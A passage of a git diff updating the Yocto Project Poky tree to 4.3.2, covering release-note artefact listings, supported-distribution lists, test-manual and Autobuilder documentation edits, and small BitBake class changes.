http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/oecore-cce77e8e79c860f4ef0ac4a86b9375bf87507360.tar.bz2 + +meta-mingw + +- Repository Location: :yocto_git:`/meta-mingw` +- Branch: :yocto_git:`nanbield </meta-mingw/log/?h=nanbield>` +- Tag: :yocto_git:`yocto-4.3.1 </meta-mingw/log/?h=yocto-4.3.1>` +- Git Revision: :yocto_git:`49617a253e09baabbf0355bc736122e9549c8ab2 </meta-mingw/commit/?id=49617a253e09baabbf0355bc736122e9549c8ab2>` +- Release Artefact: meta-mingw-49617a253e09baabbf0355bc736122e9549c8ab2 +- sha: 2225115b73589cdbf1e491115221035c6a61679a92a93b2a3cf761ff87bf4ecc +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/meta-mingw-49617a253e09baabbf0355bc736122e9549c8ab2.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/meta-mingw-49617a253e09baabbf0355bc736122e9549c8ab2.tar.bz2 + +bitbake + +- Repository Location: :oe_git:`/bitbake` +- Branch: :oe_git:`2.6 </bitbake/log/?h=2.6>` +- Tag: :oe_git:`yocto-4.3.1 </bitbake/log/?h=yocto-4.3.1>` +- Git Revision: :oe_git:`936fcec41efacc4ce988c81882a9ae6403702bea </bitbake/commit/?id=936fcec41efacc4ce988c81882a9ae6403702bea>` +- Release Artefact: bitbake-936fcec41efacc4ce988c81882a9ae6403702bea +- sha: efbdd5fe7f29227a3fd26d6a08a368bf8215083a588b4d23f3adf35044897520 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/bitbake-936fcec41efacc4ce988c81882a9ae6403702bea.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/bitbake-936fcec41efacc4ce988c81882a9ae6403702bea.tar.bz2 + +yocto-docs + +- Repository Location: :yocto_git:`/yocto-docs` +- Branch: :yocto_git:`nanbield </yocto-docs/log/?h=nanbield>` +- Tag: :yocto_git:`yocto-4.3.1 </yocto-docs/log/?h=yocto-4.3.1>` +- Git Revision: :yocto_git:`6b98a6164263298648e89b5a5ae1260a58f1bb35 </yocto-docs/commit/?id=6b98a6164263298648e89b5a5ae1260a58f1bb35>` + diff --git a/poky/documentation/ref-manual/svg/releases.svg b/poky/documentation/ref-manual/svg/releases.svg index 5333498d1f..198d4632b1 100644 --- a/poky/documentation/ref-manual/svg/releases.svg +++ b/poky/documentation/ref-manual/svg/releases.svg @@ -404,15 +404,15 @@ guidetolerance="10" inkscape:pageopacity="0" inkscape:pageshadow="2" - inkscape:window-width="1846" - inkscape:window-height="1016" + inkscape:window-width="1920" + inkscape:window-height="1043" id="namedview4" showgrid="true" - inkscape:zoom="0.51166405" - inkscape:cx="-43.974166" - inkscape:cy="311.72798" - inkscape:window-x="1994" - inkscape:window-y="27" + inkscape:zoom="1.4472045" + inkscape:cx="736.24703" + inkscape:cy="312.32629" + inkscape:window-x="1728" + inkscape:window-y="0" inkscape:window-maximized="1" inkscape:current-layer="g10" inkscape:document-rotation="0" @@ -669,28 +669,28 @@ style="font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;font-size:13.3333px;font-family:'Liberation Sans';-inkscape-font-specification:'Liberation Sans Bold';text-align:center;text-anchor:middle;fill:#fffefe;fill-opacity:1;stroke:none" id="tspan10317-2-9-1-4">4.2</tspan></text> <g - id="g32107"> + id="g1379"> <rect - style="opacity:0.75;fill:#333333;fill-opacity:1;fill-rule:evenodd;stroke:none;stroke-width:2;stroke-opacity:1" - id="rect917-0-0-4-4-9-4-5-3" - width="140.00014" + style="fill:#333333;fill-opacity:1;fill-rule:evenodd;stroke:none;stroke-width:2;stroke-opacity:1" + id="rect917-0-0-4-4-9-4-5-38" + width="140.00003" height="45.000004" - x="1199.9999" - y="-229.99998" + x="1220" + y="-230.00005" ry="2.2558987" /> <text xml:space="preserve" style="font-weight:bold;font-size:13.3333px;line-height:125%;font-family:'Nimbus Roman';-inkscape-font-specification:'Nimbus Roman, Bold';letter-spacing:0px;word-spacing:0px;writing-mode:lr-tb;fill:#fffefe;fill-opacity:1;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1" - x="1247.2329" + x="1269.2329" y="-210.32925" id="text1185-3-55-4-0-0-0-1-1"><tspan sodipodi:role="line" - x="1247.2329" + x="1269.2329" y="-210.32925" style="font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;font-size:13.3333px;font-family:'Liberation Sans';-inkscape-font-specification:'Liberation Sans Bold';text-align:center;text-anchor:middle;fill:#fffefe;fill-opacity:1;stroke:none" id="tspan957-2-8-6-3-9-7-4">Nanbield</tspan><tspan sodipodi:role="line" - x="1247.2329" + x="1269.2329" y="-192.33258" style="font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;font-size:13.3333px;font-family:'Liberation Sans';-inkscape-font-specification:'Liberation Sans Bold';text-align:center;text-anchor:middle;fill:#fffefe;fill-opacity:1;stroke:none" id="tspan10317-2-9-1-4-6">4.3</tspan></text> diff --git a/poky/documentation/ref-manual/system-requirements.rst b/poky/documentation/ref-manual/system-requirements.rst index e1ff51c859..9dee24a1fa 100644 --- a/poky/documentation/ref-manual/system-requirements.rst +++ b/poky/documentation/ref-manual/system-requirements.rst @@ -62,8 +62,6 @@ supported on the following distributions: - Ubuntu 22.04 (LTS) -- Fedora 37 - - Fedora 38 - CentOS Stream 8 @@ -74,19 +72,18 @@ supported on the following distributions: - OpenSUSE Leap 15.4 -- AlmaLinux 8.8 +- AlmaLinux 8 -- AlmaLinux 9.2 +- AlmaLinux 9 -The following distribution versions are still tested (being listed -in :term:`SANITY_TESTED_DISTROS`), even though the organizations -publishing them no longer make updates publicly available: +- Rocky 9 -- Ubuntu 18.04 (LTS) +The following distribution versions are still tested, even though the +organizations publishing them no longer make updates publicly available: -- Ubuntu 22.10 +- Ubuntu 18.04 (LTS) -- OpenSUSE Leap 15.3 +- Ubuntu 23.04 Note that the Yocto Project doesn't have access to private updates that some of these versions may have. Therefore, our testing has @@ -95,7 +92,11 @@ limited value if you have access to such updates. Finally, here are the distribution versions which were previously tested on former revisions of "&DISTRO_NAME;", but no longer are: -*This list is currently empty* +- Ubuntu 22.10 + +- Fedora 37 + +- OpenSUSE Leap 15.3 .. note:: diff --git a/poky/documentation/ref-manual/variables.rst b/poky/documentation/ref-manual/variables.rst index 12889a5085..b394d31099 100644 --- a/poky/documentation/ref-manual/variables.rst +++ b/poky/documentation/ref-manual/variables.rst @@ -5347,9 +5347,8 @@ system and gives an overview of their function and contents. :term:`PREMIRRORS`, the upstream source, and then locations specified by :term:`MIRRORS` in that order. - Assuming your distribution (:term:`DISTRO`) is "poky", - the default value for :term:`MIRRORS` is defined in the - ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository. + The default value for :term:`MIRRORS` is defined in the + ``meta/classes-global/mirrors.bbclass`` file in the core metadata layer. :term:`MLPREFIX` Specifies a prefix has been added to :term:`PN` to create a @@ -6647,9 +6646,8 @@ system and gives an overview of their function and contents. source, and then locations specified by :term:`MIRRORS` in that order. - Assuming your distribution (:term:`DISTRO`) is "poky", - the default value for :term:`PREMIRRORS` is defined in the - ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository. + The default value for :term:`PREMIRRORS` is defined in the + ``meta/classes-global/mirrors.bbclass`` file in the core metadata layer. Typically, you could add a specific server for the build system to attempt before any others by adding something like the following to diff --git a/poky/documentation/test-manual/intro.rst b/poky/documentation/test-manual/intro.rst index aaf64ae017..c31fd11c7a 100644 --- a/poky/documentation/test-manual/intro.rst +++ b/poky/documentation/test-manual/intro.rst @@ -14,15 +14,13 @@ release works as intended. All the project's testing infrastructure and processes are publicly visible and available so that the community can see what testing is being performed, how it's being done and the current status of the tests and the project at any given time. It is intended -that Other organizations can leverage off the process and testing +that other organizations can leverage off the process and testing environment used by the Yocto Project to create their own automated, production test environment, building upon the foundations from the project core. -Currently, the Yocto Project Test Environment Manual has no projected -release date. This manual is a work-in-progress and is being initially -loaded with information from the README files and notes from key -engineers: +This manual is a work-in-progress and is being initially loaded with +information from the README files and notes from key engineers: - *yocto-autobuilder2:* This :yocto_git:`README.md </yocto-autobuilder2/tree/README.md>` @@ -39,7 +37,7 @@ engineers: As a result, it can be used by any Continuous Improvement (CI) system to run builds, support getting the correct code revisions, configure builds and layers, run builds, and collect results. The code is - independent of any CI system, which means the code can work `Buildbot <https://docs.buildbot.net/0.9.15.post1/>`__, + independent of any CI system, which means the code can work `Buildbot <https://docs.buildbot.net/current/>`__, Jenkins, or others. This repository has a branch per release of the project defining the tests to run on a per release basis. @@ -54,8 +52,8 @@ the Autobuilder tests if things work. The Autobuilder builds all test targets and runs all the tests. The Yocto Project uses now uses standard upstream -`Buildbot <https://docs.buildbot.net/0.9.15.post1/>`__ (version 9) to -drive its integration and testing. Buildbot Nine has a plug-in interface +Buildbot (`version 3.8 <https://docs.buildbot.net/3.8.0/>`__) to +drive its integration and testing. Buildbot has a plug-in interface that the Yocto Project customizes using code from the ``yocto-autobuilder2`` repository, adding its own console UI plugin. The resulting UI plug-in allows you to visualize builds in a way suited to @@ -93,8 +91,8 @@ the following types of tests: - *Build Testing:* Tests whether specific configurations build by varying :term:`MACHINE`, :term:`DISTRO`, other configuration - options, and the specific target images being built (or world). Used - to trigger builds of all the different test configurations on the + options, and the specific target images being built (or ``world``). This is + used to trigger builds of all the different test configurations on the Autobuilder. Builds usually cover many different targets for different architectures, machines, and distributions, as well as different configurations, such as different init systems. The @@ -120,7 +118,7 @@ the following types of tests: $ bitbake image -c testsdkext - The tests utilize the :ref:`ref-classes-testsdk` class and the + The tests use the :ref:`ref-classes-testsdk` class and the ``do_testsdkext`` task. - *Feature Testing:* Various scenario-based tests are run through the @@ -131,7 +129,7 @@ the following types of tests: $ bitbake image -c testimage - The tests utilize the :ref:`ref-classes-testimage` + The tests use the :ref:`ref-classes-testimage` class and the :ref:`ref-tasks-testimage` task. - *Layer Testing:* The Autobuilder has the possibility to test whether @@ -151,7 +149,7 @@ the following types of tests: $ bitbake image -c testsdk - The tests utilize the :ref:`ref-classes-testsdk` class and + The tests use the :ref:`ref-classes-testsdk` class and the ``do_testsdk`` task. - *Unit Testing:* Unit tests on various components of the system run @@ -190,38 +188,39 @@ Tests map into the codebase as follows: $ bitbake-selftest -v To skip tests that access the Internet, use the ``BB_SKIP_NETTESTS`` - variable when running "bitbake-selftest" as follows:: + variable when running ``bitbake-selftest`` as follows:: $ BB_SKIP_NETTESTS=yes bitbake-selftest Use this option when you wish to skip tests that access the network, which are mostly necessary to test the fetcher modules. To specify individual test modules to run, append the test module name to the - "bitbake-selftest" command. For example, to specify the tests for the - bb.data.module, run:: + ``bitbake-selftest`` command. For example, to specify the tests for + ``bb.tests.data.DataExpansions``, run:: - $ bitbake-selftest bb.test.data.module + $ bitbake-selftest bb.tests.data.DataExpansions You can also specify individual tests by defining the full name and module plus the class path of the test, for example:: - $ bitbake-selftest bb.tests.data.TestOverrides.test_one_override + $ bitbake-selftest bb.tests.data.DataExpansions.test_one_var - The tests are based on `Python - unittest <https://docs.python.org/3/library/unittest.html>`__. + The tests are based on + `Python unittest <https://docs.python.org/3/library/unittest.html>`__. - *oe-selftest:* - These tests use OE to test the workflows, which include testing specific features, behaviors of tasks, and API unit tests. - - The tests can take advantage of parallelism through the "-j" + - The tests can take advantage of parallelism through the ``-j`` option, which can specify a number of threads to spread the tests across. Note that all tests from a given class of tests will run in the same thread. To parallelize large numbers of tests you can split the class into multiple units. - - The tests are based on Python unittest. + - The tests are based on + `Python unittest <https://docs.python.org/3/library/unittest.html>`__. - The code for the tests resides in ``meta/lib/oeqa/selftest/cases/``. @@ -231,18 +230,18 @@ Tests map into the codebase as follows: $ oe-selftest -a - To run a specific test, use the following command form where - testname is the name of the specific test:: + ``testname`` is the name of the specific test:: $ oe-selftest -r <testname> - For example, the following command would run the tinfoil - getVar API test:: + For example, the following command would run the ``tinfoil`` + ``getVar`` API test:: $ oe-selftest -r tinfoil.TinfoilTests.test_getvar It is also possible to run a set of tests. For example the following command will run all of the - tinfoil tests:: + ``tinfoil`` tests:: $ oe-selftest -r tinfoil @@ -277,7 +276,7 @@ Tests map into the codebase as follows: - These tests build an extended SDK (eSDK), install that eSDK, and run tests against the eSDK. - - The code for these tests resides in ``meta/lib/oeqa/esdk``. + - The code for these tests resides in ``meta/lib/oeqa/sdkext/cases/``. - To run the tests, use the following command form:: @@ -304,13 +303,13 @@ Tests map into the codebase as follows: Git repository. Use the ``oe-build-perf-report`` command to generate text reports - and HTML reports with graphs of the performance data. For - examples, see - :yocto_dl:`/releases/yocto/yocto-2.7/testresults/buildperf-centos7/perf-centos7.yoctoproject.org_warrior_20190414204758_0e39202.html` + and HTML reports with graphs of the performance data. See + :yocto_dl:`html </releases/yocto/yocto-4.3/testresults/buildperf-debian11/perf-debian11_nanbield_20231019191258_15b576c410.html>` and - :yocto_dl:`/releases/yocto/yocto-2.7/testresults/buildperf-centos7/perf-centos7.yoctoproject.org_warrior_20190414204758_0e39202.txt`. + :yocto_dl:`txt </releases/yocto/yocto-4.3/testresults/buildperf-debian11/perf-debian11_nanbield_20231019191258_15b576c410.txt>` + examples. - - The tests are contained in ``lib/oeqa/buildperf/test_basic.py``. + - The tests are contained in ``meta/lib/oeqa/buildperf/test_basic.py``. Test Examples ============= @@ -318,16 +317,14 @@ Test Examples This section provides example tests for each of the tests listed in the :ref:`test-manual/intro:How Tests Map to Areas of Code` section. -For oeqa tests, testcases for each area reside in the main test -directory at ``meta/lib/oeqa/selftest/cases`` directory. +- ``oe-selftest`` testcases reside in the ``meta/lib/oeqa/selftest/cases`` directory. -For oe-selftest. bitbake testcases reside in the ``lib/bb/tests/`` -directory. +- ``bitbake-selftest`` testcases reside in the ``bitbake/lib/bb/tests/`` directory. ``bitbake-selftest`` -------------------- -A simple test example from ``lib/bb/tests/data.py`` is:: +A simple test example from ``bitbake/lib/bb/tests/data.py`` is:: class DataExpansions(unittest.TestCase): def setUp(self): @@ -340,21 +337,24 @@ A simple test example from ``lib/bb/tests/data.py`` is:: val = self.d.expand("${foo}") self.assertEqual(str(val), "value_of_foo") -In this example, a ``DataExpansions`` class of tests is created, -derived from standard Python unittest. The class has a common ``setUp`` -function which is shared by all the tests in the class. A simple test is -then added to test that when a variable is expanded, the correct value -is found. +In this example, a ``DataExpansions`` class of tests is created, derived from +standard `Python unittest <https://docs.python.org/3/library/unittest.html>`__. +The class has a common ``setUp`` function which is shared by all the tests in +the class. A simple test is then added to test that when a variable is +expanded, the correct value is found. -BitBake selftests are straightforward Python unittest. Refer to the -Python unittest documentation for additional information on writing -these tests at: https://docs.python.org/3/library/unittest.html. +BitBake selftests are straightforward +`Python unittest <https://docs.python.org/3/library/unittest.html>`__. +Refer to the `Python unittest documentation +<https://docs.python.org/3/library/unittest.html>`__ for additional information +on writing such tests. ``oe-selftest`` --------------- These tests are more complex due to the setup required behind the scenes -for full builds. Rather than directly using Python's unittest, the code +for full builds. Rather than directly using `Python unittest +<https://docs.python.org/3/library/unittest.html>`__, the code wraps most of the standard objects. The tests can be simple, such as testing a command from within the OE build environment using the following example:: @@ -391,14 +391,14 @@ so tests within a given test class should always run in the same build, while tests in different classes or modules may be split into different builds. There is no data store available for these tests since the tests launch the ``bitbake`` command and exist outside of its context. As a -result, common bitbake library functions (bb.\*) are also unavailable. +result, common BitBake library functions (``bb.\*``) are also unavailable. ``testimage`` ------------- These tests are run once an image is up and running, either on target hardware or under QEMU. As a result, they are assumed to be running in a -target image environment, as opposed to a host build environment. A +target image environment, as opposed to in a host build environment. A simple example from ``meta/lib/oeqa/runtime/cases/python.py`` contains the following:: @@ -413,19 +413,19 @@ the following:: In this example, the ``OERuntimeTestCase`` class wraps ``unittest.TestCase``. Within the test, ``self.target`` represents the -target system, where commands can be run on it using the ``run()`` +target system, where commands can be run using the ``run()`` method. -To ensure certain test or package dependencies are met, you can use the +To ensure certain tests or package dependencies are met, you can use the ``OETestDepends`` and ``OEHasPackage`` decorators. For example, the test -in this example would only make sense if python3-core is installed in +in this example would only make sense if ``python3-core`` is installed in the image. ``testsdk_ext`` --------------- These tests are run against built extensible SDKs (eSDKs). The tests can -assume that the eSDK environment has already been setup. An example from +assume that the eSDK environment has already been set up. An example from ``meta/lib/oeqa/sdk/cases/devtool.py`` contains the following:: class DevtoolTest(OESDKExtTestCase): @@ -472,9 +472,9 @@ following:: output = self._run(cmd) self.assertEqual(output, "Hello, world\n") -In this example, if nativesdk-python3-core has been installed into the SDK, the code runs -the python3 interpreter with a basic command to check it is working -correctly. The test would only run if Python3 is installed in the SDK. +In this example, if ``nativesdk-python3-core`` has been installed into the SDK, +the code runs the ``python3`` interpreter with a basic command to check it is +working correctly. The test would only run if Python3 is installed in the SDK. ``oe-build-perf-test`` ---------------------- @@ -520,7 +520,7 @@ an isolated directory. This can delete files from :term:`SSTATE_DIR` which would potentially break other builds running in parallel. If this is required, :term:`SSTATE_DIR` must -be set to an isolated directory. Alternatively, you can use the "-f" +be set to an isolated directory. Alternatively, you can use the ``-f`` option with the ``bitbake`` command to "taint" tasks by changing the sstate checksums to ensure sstate cache items will not be reused. diff --git a/poky/documentation/test-manual/test-process.rst b/poky/documentation/test-manual/test-process.rst index 4c3b32bfea..7bec5ba828 100644 --- a/poky/documentation/test-manual/test-process.rst +++ b/poky/documentation/test-manual/test-process.rst @@ -20,8 +20,8 @@ helps review and test patches and this is his testing tree). We have two broad categories of test builds, including "full" and "quick". On the Autobuilder, these can be seen as "a-quick" and "a-full", simply for ease of sorting in the UI. Use our Autobuilder -console view to see where me manage most test-related items, available -at: :yocto_ab:`/typhoon/#/console`. +:yocto_ab:`console view </typhoon/#/console>` to see where we manage most +test-related items. Builds are triggered manually when the test branches are ready. The builds are monitored by the SWAT team. For additional information, see @@ -34,24 +34,21 @@ which the result was required. The Autobuilder does build the ``master`` branch once daily for several reasons, in particular, to ensure the current ``master`` branch does -build, but also to keep ``yocto-testresults`` -(:yocto_git:`/yocto-testresults/`), -buildhistory -(:yocto_git:`/poky-buildhistory/`), and -our sstate up to date. On the weekend, there is a master-next build +build, but also to keep (:yocto_git:`yocto-testresults </yocto-testresults/>`), +(:yocto_git:`buildhistory </poky-buildhistory/>`), and +our sstate up to date. On the weekend, there is a ``master-next`` build instead to ensure the test results are updated for the less frequently run targets. -Performance builds (buildperf-\* targets in the console) are triggered +Performance builds (``buildperf-\*`` targets in the console) are triggered separately every six hours and automatically push their results to the -buildstats repository at: -:yocto_git:`/yocto-buildstats/`. +:yocto_git:`buildstats </yocto-buildstats/>` repository. -The 'quick' targets have been selected to be the ones which catch the -most failures or give the most valuable data. We run 'fast' ptests in +The "quick" targets have been selected to be the ones which catch the +most failures or give the most valuable data. We run "fast" ptests in this case for example but not the ones which take a long time. The quick -target doesn't include \*-lsb builds for all architectures, some world -builds and doesn't trigger performance tests or ltp testing. The full +target doesn't include ``\*-lsb`` builds for all architectures, some ``world`` +builds and doesn't trigger performance tests or ``ltp`` testing. The full build includes all these things and is slower but more comprehensive. Release Builds @@ -67,12 +64,12 @@ that in :ref:`test-manual/test-process:day to day development`, in that the a-full target of the Autobuilder is used but in addition the form is configured to generate and publish artifacts and the milestone number, version, release candidate number and other information is entered. The -box to "generate an email to QA"is also checked. +box to "generate an email to QA" is also checked. -When the build completes, an email is sent out using the send-qa-email -script in the ``yocto-autobuilder-helper`` repository to the list of -people configured for that release. Release builds are placed into a -directory in https://autobuilder.yocto.io/pub/releases on the +When the build completes, an email is sent out using the ``send-qa-email`` +script in the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>` +repository to the list of people configured for that release. Release builds +are placed into a directory in https://autobuilder.yocto.io/pub/releases on the Autobuilder which is included in the email. The process from here is more manual and control is effectively passed to release engineering. The next steps include: @@ -80,14 +77,15 @@ The next steps include: - QA teams respond to the email saying which tests they plan to run and when the results will be available. -- QA teams run their tests and share their results in the yocto- - testresults-contrib repository, along with a summary of their - findings. +- QA teams run their tests and share their results in the + :yocto_git:`yocto-testresults-contrib </yocto-testresults-contrib>` + repository, along with a summary of their findings. - Release engineering prepare the release as per their process. - Test results from the QA teams are included into the release in - separate directories and also uploaded to the yocto-testresults + separate directories and also uploaded to the + :yocto_git:`yocto-testresults </yocto-testresults>` repository alongside the other test results for the given revision. - The QA report in the final release is regenerated using resulttool to diff --git a/poky/documentation/test-manual/understand-autobuilder.rst b/poky/documentation/test-manual/understand-autobuilder.rst index 7a6cb2443b..6b4fab4f0b 100644 --- a/poky/documentation/test-manual/understand-autobuilder.rst +++ b/poky/documentation/test-manual/understand-autobuilder.rst @@ -9,8 +9,8 @@ Execution Flow within the Autobuilder The "a-full" and "a-quick" targets are the usual entry points into the Autobuilder and it makes sense to follow the process through the system -starting there. This is best visualized from the Autobuilder Console -view (:yocto_ab:`/typhoon/#/console`). +starting there. This is best visualized from the :yocto_ab:`Autobuilder +Console view </typhoon/#/console>`. Each item along the top of that view represents some "target build" and these targets are all run in parallel. The 'full' build will trigger the @@ -18,9 +18,9 @@ majority of them, the "quick" build will trigger some subset of them. The Autobuilder effectively runs whichever configuration is defined for each of those targets on a separate buildbot worker. To understand the configuration, you need to look at the entry on ``config.json`` file -within the ``yocto-autobuilder-helper`` repository. The targets are -defined in the ‘overrides' section, a quick example could be qemux86-64 -which looks like:: +within the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>` +repository. The targets are defined in the ``overrides`` section, a quick +example could be ``qemux86-64`` which looks like:: "qemux86-64" : { "MACHINE" : "qemux86-64", @@ -32,8 +32,8 @@ which looks like:: } }, -And to expand that, you need the "arch-qemu" entry from -the "templates" section, which looks like:: +And to expand that, you need the ``arch-qemu`` entry from +the ``templates`` section, which looks like:: "arch-qemu" : { "BUILDINFO" : true, @@ -54,11 +54,11 @@ the "templates" section, which looks like:: } }, -Combining these two entries you can see that "qemux86-64" is a three step build where the -``bitbake BBTARGETS`` would be run, then ``bitbake SANITYTARGETS`` for each step; all for -``MACHINE="qemux86-64"`` but with differing :term:`SDKMACHINE` settings. In step -1 an extra variable is added to the ``auto.conf`` file to enable wic -image generation. +Combining these two entries you can see that ``qemux86-64`` is a three step +build where ``bitbake BBTARGETS`` would be run, then ``bitbake SANITYTARGETS`` +for each step; all for ``MACHINE="qemux86-64"`` but with differing +:term:`SDKMACHINE` settings. In step 1, an extra variable is added to the +``auto.conf`` file to enable wic image generation. While not every detail of this is covered here, you can see how the template mechanism allows quite complex configurations to be built up @@ -88,9 +88,9 @@ roughly consist of: #. *Obtain yocto-autobuilder-helper* - This step clones the ``yocto-autobuilder-helper`` git repository. - This is necessary to prevent the requirement to maintain all the - release or project-specific code within Buildbot. The branch chosen + This step clones the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>` + git repository. This is necessary to avoid the requirement to maintain all + the release or project-specific code within Buildbot. The branch chosen matches the release being built so we can support older releases and still make changes in newer ones. @@ -163,8 +163,9 @@ Autobuilder Worker Janitor -------------------------- This is a process running on each Worker that performs two basic -operations, including background file deletion at IO idle (see :ref:`test-manual/understand-autobuilder:Autobuilder Target Execution Overview`: Run clobberdir) and -maintenance of a cache of cloned repositories to improve the speed +operations, including background file deletion at IO idle (see +"Run clobberdir" in :ref:`test-manual/understand-autobuilder:Autobuilder Target Execution Overview`) +and maintenance of a cache of cloned repositories to improve the speed the system can checkout repositories. Shared DL_DIR @@ -172,7 +173,7 @@ Shared DL_DIR The Workers are all connected over NFS which allows :term:`DL_DIR` to be shared between them. This reduces network accesses from the system and allows -the build to be sped up. Usage of the directory within the build system +the build to be sped up. The usage of the directory within the build system is designed to be able to be shared over NFS. Shared SSTATE_DIR @@ -180,8 +181,8 @@ Shared SSTATE_DIR The Workers are all connected over NFS which allows the ``sstate`` directory to be shared between them. This means once a Worker has built -an artifact, all the others can benefit from it. Usage of the directory -within the directory is designed for sharing over NFS. +an artifact, all the others can benefit from it. The usage of the directory +within the build system is designed for sharing over NFS. Resulttool ---------- @@ -192,7 +193,7 @@ in a given build and their status. Additional information, such as failure logs or the time taken to run the tests, may also be included. Resulttool is part of OpenEmbedded-Core and is used to manipulate these -json results files. It has the ability to merge files together, display +JSON results files. It has the ability to merge files together, display reports of the test results and compare different result files. For details, see :yocto_wiki:`/Resulttool`. @@ -206,7 +207,7 @@ are general setup steps that are run once and include: #. Set up any :term:`buildtools` tarball if configured. -#. Call "buildhistory-init" if :ref:`ref-classes-buildhistory` is configured. +#. Call ``buildhistory-init`` if :ref:`ref-classes-buildhistory` is configured. For each step that is configured in ``config.json``, it will perform the following: @@ -250,15 +251,16 @@ Deploying Yocto Autobuilder =========================== The most up to date information about how to setup and deploy your own -Autobuilder can be found in README.md in the ``yocto-autobuilder2`` -repository. +Autobuilder can be found in :yocto_git:`README.md </yocto-autobuilder2/tree/README.md>` +in the :yocto_git:`yocto-autobuilder2 </yocto-autobuilder2>` repository. -We hope that people can use the ``yocto-autobuilder2`` code directly but -it is inevitable that users will end up needing to heavily customise the -``yocto-autobuilder-helper`` repository, particularly the -``config.json`` file as they will want to define their own test matrix. +We hope that people can use the :yocto_git:`yocto-autobuilder2 </yocto-autobuilder2>` +code directly but it is inevitable that users will end up needing to heavily +customize the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>` +repository, particularly the ``config.json`` file as they will want to define +their own test matrix. -The Autobuilder supports wo customization options: +The Autobuilder supports two customization options: - variable substitution @@ -278,7 +280,7 @@ environment:: $ ABHELPER_JSON="config.json /some/location/local.json" One issue users often run into is validation of the ``config.json`` files. A -tip for minimizing issues from invalid json files is to use a Git +tip for minimizing issues from invalid JSON files is to use a Git ``pre-commit-hook.sh`` script to verify the JSON file before committing it. Create a symbolic link as follows:: diff --git a/poky/documentation/what-i-wish-id-known.rst b/poky/documentation/what-i-wish-id-known.rst index 10f746ff1f..fe79bc0129 100644 --- a/poky/documentation/what-i-wish-id-known.rst +++ b/poky/documentation/what-i-wish-id-known.rst @@ -29,8 +29,9 @@ contact us with other suggestions. #. **Get to know the layer index:** All layers can be found in the :oe_layerindex:`layer index <>`. Layers which have applied for Yocto Project Compatible status (structure continuity - assurance and testing) can be found in the :yocto_home:`Yocto Project Compatible index - </software-over/layer/>`. Generally check the Compatible layer index first, + assurance and testing) can be found in the :yocto_home:`Yocto Project + Compatible Layers </development/yocto-project-compatible-layers/>` page. + Generally check the Compatible layer index first, and if you don't find the necessary layer check the general layer index. The layer index is an original artifact from the Open Embedded Project. As such, that index doesn't have the curating and testing that the Yocto Project diff --git a/poky/meta-poky/conf/distro/poky.conf b/poky/meta-poky/conf/distro/poky.conf index a111df8393..7d6eb60cbb 100644 --- a/poky/meta-poky/conf/distro/poky.conf +++ b/poky/meta-poky/conf/distro/poky.conf @@ -1,6 +1,6 @@ DISTRO = "poky" DISTRO_NAME = "Poky (Yocto Project Reference Distro)" -DISTRO_VERSION = "4.3.1" +DISTRO_VERSION = "4.3.2" DISTRO_CODENAME = "nanbield" SDK_VENDOR = "-pokysdk" SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${METADATA_REVISION}', 'snapshot')}" diff --git a/poky/meta/classes-global/package_ipk.bbclass b/poky/meta/classes-global/package_ipk.bbclass index b4b7bc9ac2..64fa237c00 100644 --- a/poky/meta/classes-global/package_ipk.bbclass +++ b/poky/meta/classes-global/package_ipk.bbclass @@ -47,6 +47,10 @@ python do_package_ipk () { do_package_ipk[vardeps] += "ipk_write_pkg" do_package_ipk[vardepsexclude] = "BB_NUMBER_THREADS" +# FILE isn't included by default but we want the recipe to change if basename() changes +IPK_RECIPE_FILE = "${@os.path.basename(d.getVar('FILE'))}" +IPK_RECIPE_FILE[vardepvalue] = "${IPK_RECIPE_FILE}" + def ipk_write_pkg(pkg, d): import re, copy import subprocess @@ -62,7 +66,7 @@ def ipk_write_pkg(pkg, d): outdir = d.getVar('PKGWRITEDIRIPK') pkgdest = d.getVar('PKGDEST') - recipesource = os.path.basename(d.getVar('FILE')) + recipesource = d.getVar('IPK_RECIPE_FILE') localdata = bb.data.createCopy(d) root = "%s/%s" % (pkgdest, pkg) diff --git a/poky/meta/classes-global/sstate.bbclass b/poky/meta/classes-global/sstate.bbclass index 2676f18e0a..5b27a1f0f9 100644 --- a/poky/meta/classes-global/sstate.bbclass +++ b/poky/meta/classes-global/sstate.bbclass @@ -937,6 +937,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True, sstatefile = d.expand("${SSTATE_DIR}/" + getsstatefile(tid, siginfo, d)) if os.path.exists(sstatefile): + oe.utils.touch(sstatefile) found.add(tid) bb.debug(2, "SState: Found valid sstate file %s" % sstatefile) else: @@ -1183,16 +1184,7 @@ python sstate_eventhandler() { if not os.path.exists(siginfo): bb.siggen.dump_this_task(siginfo, d) else: - try: - os.utime(siginfo, None) - except PermissionError: - pass - except OSError as e: - # Handle read-only file systems gracefully - import errno - if e.errno != errno.EROFS: - raise e - + oe.utils.touch(siginfo) } SSTATE_PRUNE_OBSOLETEWORKDIR ?= "1" diff --git a/poky/meta/classes-recipe/kernel-arch.bbclass b/poky/meta/classes-recipe/kernel-arch.bbclass index 6a50bbfd42..404f2e7061 100644 --- a/poky/meta/classes-recipe/kernel-arch.bbclass +++ b/poky/meta/classes-recipe/kernel-arch.bbclass @@ -74,8 +74,8 @@ TARGET_STRIP_KERNEL_ARCH ?= "" HOST_STRIP_KERNEL_ARCH ?= "${TARGET_STRIP_KERNEL_ARCH}" KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} 